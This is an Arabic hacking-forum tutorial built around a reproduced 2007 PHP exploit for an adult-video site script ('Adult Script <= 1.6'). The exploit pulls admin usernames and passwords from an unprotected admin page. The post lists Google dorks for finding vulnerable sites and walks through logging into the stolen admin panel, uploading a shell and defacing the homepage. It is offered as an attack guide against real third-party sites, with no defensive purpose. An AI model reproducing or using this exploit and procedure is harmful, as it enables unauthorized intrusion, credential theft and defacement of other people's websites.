=]
بــــــــــــــــــــــــــــسم الله الـــــــــــــــرحــــــمـــــن الــــــــــــــرحــــــــيــــــــــــــــم
الحمد لله الذي جعلنا مسلمين
م صل و سلم على سيدنا محمد و على آله و صحبه أجمعين و من
تبعهم بإحسان إلى يوم الدين آمين
السلام عليكم و رحمة الله و بركاته أهل بيت الهكر
اليوم باذن الله سنقوم بشرح ثغرة جديدة نزلت تقريبا في جميع مواقع السكيوريتي بتاريخ 2007-12-13
اسم الثغرة هو
Adult ****** Unauthorized Administrative Access Exploit
و الثغرة مكتوبة بلغة PHP
و هذه الثغرة تخص سكربت معين الغرض منه بالتحديد انه يستعمل في المواقع الاباحية التي تعرض
الفيديوهات
نشوف رابط الثغرة معا في موقع الميل ورم
Adult Script <= 1.6 Unauthorized Administrative Access Exploitكود PHP:
( ($_SESSION['adminid']=="") && ($_SESSION['admintype'] !=1))
{
header("Location: logout.php"); // Bypass Me
}
</pre>
<br>
<b>Dork</b>:<br>
inurl:submit-user-link.html<br>
inurl:video-listing-cat<br>
inurl:hosted-videos<br>
inurl:porn-listing-cat<br>
"Powered By Adult******.NET"<br>
"Copyright 2007 [IAG].Adult******.v1.5.Nulled"<br>
<br>
<form method="POST" action="">
<input name="adres" type="text" value="Target example:
http://www.site.com/" size="70" onFocus="if(this.value=='Target example:
http://www.site.com/')this.value=''" onBlur="if(this.value=='')this.value='Target example:
http://www.site.com/'"><input name="yolla" type="submit" value="Send">
</form>
<br>
<?php
function dosya_indir($liz0){
$ch = curl_init();
$timeout = 0;
curl_setopt ($ch, CURLOPT_URL, $liz0);
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
$veri = curl_exec($ch);
curl_close($ch);
return $veri;
}
$desen='|value="(.*)"|';
if($_POST[yolla])
{
$adres=$_POST[adres];
if(!eregi("http",$adres))
{
$adres="http://".$adres;
}
if($adres=="") { echo 'Boş Yerleri Doldurun'; exit(); }
echo 'Target= '.htmlspecialchars($adres)."<br>";
sleep(1);
echo 'Sending Evil Code.......<br>';
$kaynak=dosya_indir($adres."/admin/administrator.php");
sleep(5);
if(eregi('value="',$kaynak)) {
echo "Exploit Has Been Succeful <br>";
preg_match_all($desen,$kaynak,$sonuc);
echo "<a target='_blank' href='".$adres."/admin/'>".$adres."/admin/</a><br>";
echo "<b>Username</b> :".htmlspecialchars($sonuc[1][0])."<br>";
echo "<b>Password</b>:".htmlspecialchars($sonuc[1][1])."<br>";
echo $adres."/admin/videolinks_view.php edit video and upload shell
";
}
else
{
echo "Exploit Has Been Failed! <br>";
}
}
?>
# milw0rm.com [2007-12-13]
جيد الان سنتعلم كيف يتم استغلال هذا النوع من الثغرات
الاستغلال يكون كالتالي تقوم بنسخ كود الثغرة كاملا ثم تنسخه بالمفكرة و تقوم بتسميته ثم تحفظ الملف
بامتداد PHP و ترفعه الى موقعك اى لازم اولا يكون عندك مساحة خاصة بك
قمت برفع الملف على مساحة مجانية بـــ ripway لكن الثغرة لم تشتغل لكن انا لم اجرب على موقع
lycos فممكن أن تنجح اذن فما الحل |5|
لازم يكون عندك استضافة مدفوعة لكى يشتغل السكربت تمام
طيب انت تقول انا ما عندي أنا اقولك ولا يهمك وجدت باحد المنتديات التركية الرابط جـــــــــاهز زي
العسل |11|
و هذا رابط الثغرة و قمت بتجربته و هو شغال تمام
http://www.r57.li/adult.phpطيب الان نبدأ بشرح كيفية التعامل مع السكربت و جلب معلومات الادمن |ok|
وهي زبدة الموضوع |7|
تابع الشرح كما في الصورة
كما نلاحظ بالصورة كل شئ وا ضح كما نرى ان السكريت سهل جدا و كل شئ موضح امامك في
السكربت نفسه الان وش تعمل الخطوة الثانية هي البحث عن مواقع مصابة و ذلك باستعمال الدورك في
محرك البحث قوقــــــــــــل شوف الصورة
انا اخترت الدورك الثاني على سبيل المثال لا الحصر انت حر في اختيار ايها شئت |7|
Googleتضع الدورك في محرك البحث و تضغط بحث تابع الصورة
ستلاحظ ظهور نتائج البحث و المواقع المصابة كثيرة و انت كل مرة استعمل دورك مختلف كي توسع
مجال البحث ...مثلا انا اخترت احد المواقع تابع الصورة
الان تروح لرابط السكربت و تبدأ بالعمل بعد ما تختار احد المواقع و بامكانك ان تجرب على الكل واحد
واحد تابع الصورة
الان طبق كما هو موضح في الصورة
كما تلاحظون عند انتهاء العملية و بعد ظهور معلومات الادمن كاتب الثغرة يقول انه بالامكان رفع شل
في الرابط المبين ادناه upload shell انا جربت ارفع شل على شكل صورة لكن ما نجحت الطريقة
معي و هذه اتركها للمحترفيين ان شاء الله يجدون لها حل |7|
طيب انت طبقت خلاص و جبت اسم و كلمة سر الادمن الان تذهب الى رابط الدخول الى لوحة التحكم
تابع الصورة
بعد وضع اسم و كلمة المرور سيتم نقلك الى لو حة تحكم الادمن تابع الصورة
الان ننتقل الى الخطوة الاخيرة و هي تنفيذ الهجوم رفع الاندكس تابع الصورة
بعد رفع الاكواد الخاصة بصفحة اختراقك او كود التحويل لا تنسى شئ مهم تابع الصورة
مبـــــــــــــــــروك الان تم الاختراق اذهب الى الصفحة الرئيسية و شاهد الاختراق